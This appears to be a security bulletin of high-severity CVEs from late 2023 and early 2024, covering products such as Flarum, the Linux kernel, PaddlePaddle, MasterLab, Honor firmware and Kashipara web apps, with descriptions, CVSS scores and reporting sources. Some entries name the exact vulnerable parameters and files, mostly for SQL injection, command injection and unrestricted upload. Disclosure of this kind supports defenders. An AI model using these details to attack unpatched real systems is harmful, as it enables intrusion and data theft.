embras — geosiap_erp Grupo Embras GEOSIAP ERP v2.2.167.02 was discovered to contain a SQL injection vulnerability via the codLogin parameter on the login page. 2023-12-30 9.8 CVE-2023-50589
cve@mitre.org
cve@mitre.org
cve@mitre.org
flarum — flarum Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe. 2024-01-05 7.5 CVE-2024-21641
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
follow-redirects — follow-redirects Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches. 2024-01-02 7.3 CVE-2023-26159
report@snyk.io
report@snyk.io
report@snyk.io
froxlor — froxlor Froxlor is open source server administration software. Prior to version 2.1.2, it was possible to submit the registration form with the essential fields, such as the username and password, left intentionally blank. This inadvertent omission allowed for a bypass of the mandatory field requirements (e.g. surname, company name) established by the system. Version 2.1.2 fixes this issue. 2024-01-03 7.5 CVE-2023-50256
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
gm_information_technologies — multi-disciplinary_design_optimization Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GM Information Technologies MDO allows SQL Injection. This issue affects MDO: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4675
iletisim@usom.gov.tr
google — android In Modem IMS Call UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161825; Issue ID: MOLY01161825 (MSV-895). 2024-01-02 7.5 CVE-2023-32889
security@mediatek.com
google — google_nest_mini An attacker in the wifi vicinity of a target Google Home can spy on the victim, resulting in Elevation of Privilege  2024-01-02 10 CVE-2023-48419
dsap-vuln-management@google.com
google — pixel_watch  In checkDebuggingDisallowed of DeviceVersionFragment.java, there is a     possible way to access adb before SUW completion due to an insecure default     value. This could lead to local escalation of privilege with no additional     execution privileges needed. User interaction is not needed for     exploitation 2024-01-02 10 CVE-2023-48418
dsap-vuln-management@google.com
google — pixel_watch There is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of health data with no additional execution privileges needed. 2024-01-02 8.4 CVE-2023-4164
dsap-vuln-management@google.com
google — wifi_pro Google Nest WiFi Pro root code-execution & user-data compromise 2024-01-02 10 CVE-2023-6339
dsap-vuln-management@google.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by path traversal arbitrary file read vulnerability because it uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory.  The product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Potential exploits can completely disrupt or take over the application. 2024-01-03 8.8 CVE-2023-45722
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics product is impacted by unauthenticated file upload vulnerability. The web application permits the upload of a certain file without requiring user authentication. 2024-01-03 8.2 CVE-2023-45724
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Improper Access Control (Controller APIs) vulnerability. Certain API endpoints are accessible to Customer Admin Users that can allow access to sensitive information about other users. 2024-01-03 8.3 CVE-2023-50343
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by the use of a broken cryptographic algorithm for encryption, potentially giving an attacker ability to decrypt sensitive information. 2024-01-03 8.2 CVE-2023-50350
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by the use of an insecure key rotation mechanism which can allow an attacker to compromise the confidentiality or integrity of data. 2024-01-03 8.2 CVE-2023-50351
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by path traversal vulnerability which allows file upload capability.  Certain endpoints permit users to manipulate the path (including the file name) where these files are stored on the server. 2024-01-03 7.6 CVE-2023-45723
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by Improper Access Control (Obsolete web pages) vulnerability. Discovery of outdated and accessible web pages, reflects a “Missing Access Control” vulnerability, which could lead to inadvertent exposure of sensitive information and/or exposing a vulnerable endpoint. 2024-01-03 7.6 CVE-2023-50341
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Insecure Direct Object Reference (IDOR) vulnerability.  A user can obtain certain details about another user as a result of improper access control. 2024-01-03 7.1 CVE-2023-50342
psirt@hcl.com
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23427
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23428
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23429
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file 2023-12-29 7.1 CVE-2023-23435
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file 2023-12-29 7.1 CVE-2023-23436
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-23442
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-23443
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51426
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51427
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51428
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by buffer overflow vulnerability, successful exploitation could cause code execution. 2023-12-29 7.8 CVE-2023-51434
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51435
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magichome Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23430
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by file writing vulnerability, successful exploitation could cause code execution 2023-12-29 9.8 CVE-2023-23424
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23431
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23432
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23433
3836d913-7555-4dd0-a509-f5667fdf5fe4
hitachi_energy — rtu500_series_cmu_firmware A vulnerability exists in the HCI Modbus TCP function included in the product versions listed above. If the HCI Modbus TCP is enabled and configured, an attacker could exploit the vulnerability by sending a specially crafted message to the RTU500 in a high rate, causing the targeted RTU500 CMU to reboot. The vulnerability is caused by a lack of flood control which eventually if exploited causes an internal stack overflow in the HCI Modbus TCP function. 2024-01-04 7.5 CVE-2022-2081
cybersecurity@hitachienergy.com
hospital_management_system — hospital_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356. 2023-12-30 7.3 CVE-2023-7172
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
jeecg — jeecg_boot SQL injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component. 2023-12-30 9.8 CVE-2023-41542
cve@mitre.org
jeecg — jeecg_boot SQL injection vulnerability in jeecg-boot v3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check. 2023-12-30 9.8 CVE-2023-41543
cve@mitre.org
cve@mitre.org
jeecg — jeecg_boot SSTI injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to execute arbitrary code via crafted HTTP request to the /jmreport/loadTableData component. 2023-12-30 9.8 CVE-2023-41544
cve@mitre.org
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘itemnameid’ parameter of the material_bill.php?action=itemRelation resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49622
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cancelid’ parameter of the material_bill.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49624
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘id’ parameter of the partylist_edit_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49625
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘buyer_address’ parameter of the buyer_detail_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49633
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘customer_details’ parameter of the buyer_invoice_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49639
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bank_details’ parameter of the party_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49658
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘quantity[]’ parameter of the submit_delivery_list.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49665
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘custmer_details’ parameter of the submit_material_list.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49666
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘dd’ parameter of the registration.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50743
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘e’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50752
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘dd’ parameter of the user/update_profile.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50753
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to an Insecure File Upload vulnerability on the ‘f’ parameter of user/update_profile_pic.php page, allowing an authenticated attacker to obtain Remote Code Execution on the server hosting the application. 2024-01-04 8.8 CVE-2023-50760
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelIDHidden’ parameter of the booking.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50862
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelIDHidden’ parameter of the generateReceipt.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50863
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelId’ parameter of the hotelDetails.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50864
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘city’ parameter of the hotelSearch.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50865
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the loginAction.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50866
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the signupAction.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50867
help@fluidattacks.com
help@fluidattacks.com
laf — laf Laf is a cloud development platform. In the Laf version design, the log uses communication with k8s to quickly retrieve logs from the container without the need for additional storage. However, in version 1.0.0-beta.13 and prior, this interface does not verify the permissions of the pod, which allows authenticated users to obtain any pod logs under the same namespace through this method, thereby obtaining sensitive information printed in the logs. As of time of publication, no known patched versions exist. 2024-01-03 9.6 CVE-2023-50253
security-advisories@github.com
security-advisories@github.com
lenovo — universal_device_client Uncontrolled search path vulnerabilities were reported in the Lenovo Universal Device Client (UDC) that could allow an attacker with local access to execute code with elevated privileges. 2024-01-03 7.8 CVE-2023-6338
psirt@lenovo.com
linux — kernel A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial-of-service condition or potential code execution. 2024-01-04 7 CVE-2023-6270
secalert@redhat.com
secalert@redhat.com
linux — kernel A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system. 2024-01-02 7.8 CVE-2024-0193
secalert@redhat.com
secalert@redhat.com
man-group — dtale D-Tale is a visualizer for Pandas data structures. Users hosting versions D-Tale prior to 3.9.0 publicly can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to only host D-Tale to trusted users. 2024-01-05 7.5 CVE-2024-21642
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
masterlab — masterlab A vulnerability classified as critical has been found in gopeak MasterLab up to 3.3.10. This affects the function sqlInject of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249147. 2023-12-29 9.8 CVE-2023-7144
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
masterlab — masterlab A vulnerability classified as critical was found in gopeak MasterLab up to 3.3.10. This vulnerability affects the function sqlInject of the file app/ctrl/Framework.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249148. 2023-12-29 9.8 CVE-2023-7145
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
masterlab — masterlab A vulnerability, which was classified as critical, has been found in gopeak MasterLab up to 3.3.10. This issue affects the function sqlInjectDelete of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument phone leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249149 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7146
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
masterlab — masterlab A vulnerability, which was classified as critical, was found in gopeak MasterLab up to 3.3.10. Affected is the function base64ImageContent of the file app/ctrl/User.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-249150 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7147
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
masterlab — masterlab A vulnerability was found in gopeak MasterLab up to 3.3.10. It has been declared as critical. Affected by this vulnerability is the function add/update of the file app/ctrl/admin/User.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249181 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7159
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
mattermost — mattermost Mattermost version 2.10.0 and earlier fails to sanitize deeplink paths, which allows an attacker to perform CSRF attacks against the server. 2023-12-29 8.8 CVE-2023-7114
responsibledisclosure@mattermost.com
mediatek — lr13 In Modem IMS Stack, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161803; Issue ID: MOLY01161803 (MSV-893). 2024-01-02 9.8 CVE-2023-32874
security@mediatek.com
mediatek — lr13 In modem EMM, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01183647; Issue ID: MOLY01183647 (MSV-963). 2024-01-02 7.5 CVE-2023-32890
security@mediatek.com
mediatek — nr15 In Modem IMS SMS UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00730807; Issue ID: MOLY00730807. 2024-01-02 7.5 CVE-2023-32886
security@mediatek.com
mediatek — nr15 In Modem IMS Stack, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161837; Issue ID: MOLY01161837 (MSV-892). 2024-01-02 7.5 CVE-2023-32887
security@mediatek.com
mediatek — nr15 In Modem IMS Call UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161830; Issue ID: MOLY01161830 (MSV-894). 2024-01-02 7.5 CVE-2023-32888
security@mediatek.com
micropython — micropython A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7152
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
micropython — micropython A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180. 2023-12-29 9.8 CVE-2023-7158
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
microsoft — python_extension Visual Studio Code Python Extension Remote Code Execution Vulnerability 2023-12-29 7.8 CVE-2020-17163
secure@microsoft.com
misskey — misskey Misskey is an open source, decentralized social media platform. Third-party applications may be able to access some endpoints or Websocket APIs that are incorrectly specified as [kind](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) or [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) without the user’s permission and perform operations such as reading or adding non-public content. As a result, if the user who authenticated the application is an administrator, confidential information such as object storage secret keys and SMTP server passwords will be leaked, and general users can also create invitation codes without permission and leak non-public user information. This is patched in version [2023.12.1](https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64). 2023-12-29 9.6 CVE-2023-52139
security-advisories@github.com
security-advisories@github.com
mtab — bookmark A vulnerability was found in MTab Bookmark up to 1.2.6 and classified as critical. This issue affects some unknown processing of the file public/install.php of the component Installation. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249395. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.1 CVE-2023-7193
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
netentsec — application_security_gateway_firmware A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file index.php?para=index of the component Login. The manipulation of the argument check_VirtualSiteId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249183. 2023-12-29 9.8 CVE-2023-7161
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
omniauth-microsoft_graph — omniauth-microsoft_graph omniauth-microsoft_graph provides an Omniauth strategy for the Microsoft Graph API. Prior to versions 2.0.0, the implementation did not validate the legitimacy of the `email` attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the `email` is used as a trusted user identifier. This could lead to account takeover. Version 2.0.0 contains a fix for this issue. 2024-01-02 8.6 CVE-2024-21632
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
otclient — otclient OTCLient is an alternative tibia client for otserv. Prior to commit db560de0b56476c87a2f967466407939196dd254, the /mehah/otclient “`Analysis – SonarCloud`” workflow is vulnerable to an expression injection in Actions, allowing an attacker to run commands remotely on the runner, leak secrets, and alter the repository using this workflow. Commit db560de0b56476c87a2f967466407939196dd254 contains a fix for this issue. 2024-01-02 9.8 CVE-2024-21623
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
paddlepaddle — paddlepaddle Stack overflow in paddle.searchsorted in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, or even more damage. 2024-01-03 9.8 CVE-2023-52304
paddle-security@baidu.com
paddlepaddle — paddlepaddle Stack overflow in paddle.linalg.lu_unpack in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, or even more damage. 2024-01-03 9.8 CVE-2023-52307
paddle-security@baidu.com
paddlepaddle — paddlepaddle Heap buffer overflow in paddle.repeat_interleave in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, information disclosure, or more damage is possible. 2024-01-03 9.8 CVE-2023-52309
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in get_online_pass_interval. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52310
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in _wget_download. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52311
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in convert_shape_compare. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52314
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.nanmedian in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38674
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.linalg.matrix_rank in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38675
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.dot in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38676
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.linalg.eig in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38677
paddle-security@baidu.com
paddlepaddle — paddlepaddle OOB access in paddle.mode in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38678
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.nextafter in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52302
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.put_along_axis in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52303
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.topk in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52305
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.lerp in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52306
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.amin in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52308
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr dereference in paddle.crop in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52312
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.argmin and paddle.argmax in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52313
paddle-security@baidu.com
pandorafms — pandora_fms Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Pandora FMS on all allows SQL Injection. Arbitrary SQL queries were allowed to be executed using any account with low privileges. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 8.8 CVE-2023-44088
security@pandorafms.com
perl — perl A vulnerability was found in Perl. This security issue occurs while Perl for Windows relies on the system path environment variable to find the shell (`cmd.exe`). When running an executable that uses the Windows Perl interpreter, Perl attempts to find and execute `cmd.exe` within the operating system. However, due to path search order issues, Perl initially looks for cmd.exe in the current working directory. This flaw allows an attacker with limited privileges to place`cmd.exe` in locations with weak permissions, such as `C:ProgramData`. By doing so, arbitrary code can be executed when an administrator attempts to use this executable from these compromised locations. 2024-01-02 7.8 CVE-2023-47039
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
poly — multiple_products A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256. 2023-12-29 7.5 CVE-2023-4463
cna@vuldb.com
cna@vuldb.com
nvd@nist.gov
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability, which was classified as critical, has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This issue affects some unknown processing of the component Diagnostic Telnet Mode. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-249257 was assigned to this vulnerability. 2023-12-29 7.2 CVE-2023-4464
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — trio_8800/trio_c60 A vulnerability was found in Poly Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability. 2023-12-29 7.6 CVE-2023-4468
cna@vuldb.com
cna@vuldb.com
nvd@nist.gov
cna@vuldb.com
cna@vuldb.com
